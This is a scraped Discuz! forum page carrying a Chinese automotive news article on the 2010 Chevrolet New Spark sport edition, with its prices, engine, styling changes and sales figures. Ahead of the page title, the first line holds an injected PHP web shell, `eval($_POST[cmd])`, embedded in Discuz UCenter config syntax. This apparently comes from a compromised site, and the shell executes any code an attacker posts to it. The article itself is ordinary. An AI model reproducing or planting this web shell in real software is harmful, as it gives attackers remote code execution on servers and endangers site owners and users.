');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 新樂馳運動款價格公佈 售4.28-4.98萬元 - 改裝俱樂部 - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

新樂馳運動款價格公佈 售4.28-4.98萬元

2010年4月18日 上汽通用五菱正式發佈了新樂馳運動款車型,這也是繼2008年底搭載1.2LP-TEC發動機的新樂馳上市之後,樂馳家族推出的一款改款產品。據悉,兼顧了運動和時尚的運動款新樂馳也將亮相即將開幕的2010北京國際車展。

    此次上市的上汽通用五菱雪佛蘭新樂馳搭載1.2L P-TEC發動機,此款發動機最大功率可達63千瓦,升功率為52.2KW。包括三款不同配置車型,售價分別為1.2MT優越型4.28萬元、1.2MT活力型4.58萬元、1.2MT時尚型4.98萬元。

   新樂馳運動款在外觀上的變化主要是前後保險槓採用了雙色設計,除了黑色的裙邊外,邊緣也有銀色的裝飾;前臉水箱格柵的U型裝飾框,讓整體質感加強不少;車身出現了鍍鉻設計,4個門把手和尾部車牌上方均加上了鍍鉻裝飾條,車頂的行李架變為鋁合金材質。內飾方面,新樂馳運動款採用了深紅色與灰色搭配的座椅顏色,雙筒式儀表,增加了車輛的運動特徵。

新樂馳市場指導價

車型 車型名稱 價格(單位:萬元)
新樂馳09款 1.2MT優越型 4.28
1.2MT活力型 4.58
1.2MT時尚型 4.98
新樂馳運動款 1.2MT優越型 4.28
1.2MT活力型 4.58
1.2MT時尚型 4.98
新樂馳 P-TEC 1.0L 1.0MT優越型 3.98
1.0MT活力型 4.33
1.0MT時尚型 4.68




新樂馳運動版增加了前部運動護板
     在動力總成和底盤結構、剎車系統等方面,新樂馳運動款與現款的1.2L配置車型沒有明顯變化,懸架方面可能略有調教。車身整體稍微加寬,變矮,運動感更強。


新增了頂部金屬行李架
     在配置上的升級主要是強調了實用性。比如將現款的2年/6萬公里的保修里程更改為3年/6萬公里,其目的還是進一步提升車型的實用性。我們一般家庭用戶每年的行駛歷程大概在2萬公里左右,而保修年限和保修里程都是以先到者為準的,因此保修時間年限的改變實際上就是為用戶增加了一年的保修期。另外,取消1.2L標準型的卡帶機、由僅前門電動改為四門電動等也都是為了進一步提升了車型的實用性和性價比。


車門把手新增鍍鉻裝飾
    作為上汽通用五菱探路乘用車市場的先鋒,樂馳經過幾年的發展,在微轎市場也已漸入佳境。今年2月,在全國微型車銷量普遍下滑的情形下,樂馳的銷量卻首次突破萬輛大關,從1月份的6999輛增長到10404輛。 「樂馳突破萬輛月銷量大關,既是受益於國家各項政策刺激,另一方面也是因為高性能微轎正在逐漸得到消費者的認可。」上汽通用五菱銷售公司總經理楊傑表示。


新樂馳運動版內飾升級
  去年樂馳的銷量增長就已顯現。2009年全年銷量超過60000輛,與2008年相比,樂馳環比增長達到47.1%,銷量增長幅度已位居A00級市場前三位。「高性能微轎的理念逐漸被用戶接受,而新樂馳運動款可以說是上汽通用五菱的信心之作。」業內人士認為。隨著微轎用戶購買能力的提升,一輛「代步工具」已經很難滿足他們的需求,個性化、高性能的微轎將獲得越來越大的市場空間,在2009CCTV中國年度汽車評選中獲得「最受青年喜愛車型」的新樂馳,此時推出運動款,顯然是瞄準了更加細分的市場。


新樂馳白底色儀表盤更為運動
  據瞭解,搭載1.2LP-TEC發動機的新樂馳,2009年的銷量已經占樂馳總銷量的一半以上。2010年上汽通用五菱為樂馳制定的銷量目標定是8萬輛,較去年增加了近2萬輛。今年前兩個月樂馳的總銷量已經超過1.7萬輛,同比增長72%。此時推出新樂馳運動款,除了滿足細分市場消費者的需求之外,為樂馳銷量製造新的增長點無疑也是企業的意圖之一。



  樂馳多年來不變的外觀,雖然領創國際經典,但作為消費者來說,還是更願意看到新的變化。這次,運動款在外觀上有了顯著變化:前後保險槓採用了雙色設計,除了黑色的裙邊外,邊緣也有銀色的裝飾;前臉水箱格柵的U型裝飾框,讓整體質感加強不少;車身出現了鍍鉻設計,4個門把手和尾部車牌上方均加上了鍍鉻裝飾條,車頂的行李架變為鋁合金材質,更顯檔次。從上到下、從前到後,渾身透著「運動范」。



  在內部空間方面,佈局基本沒有變化,座椅和中控台在材料及設計上得到了提升, 紅黑雙色座椅,和車身外部的運動款套件融為一體,運動味十足。





  從新發佈的配置參數來看,新樂馳運動款仍以1.2L車型配置為主,沒有太大調整,主要還是體現在設計和結構上的細節變化。最關鍵的是,新樂馳運動款搭載了同09款一樣的P-TEC發動機,動力性能優越,配置上的優化會使車輛在高速時更加穩定。所謂運動款,筆者認為更多是從感官上和乘坐穩定性上來定義的,不過話說回來,這款時速已經能達到160km的發動機,穩定性加強之後也意味著可控速度將變得更高。
返回列表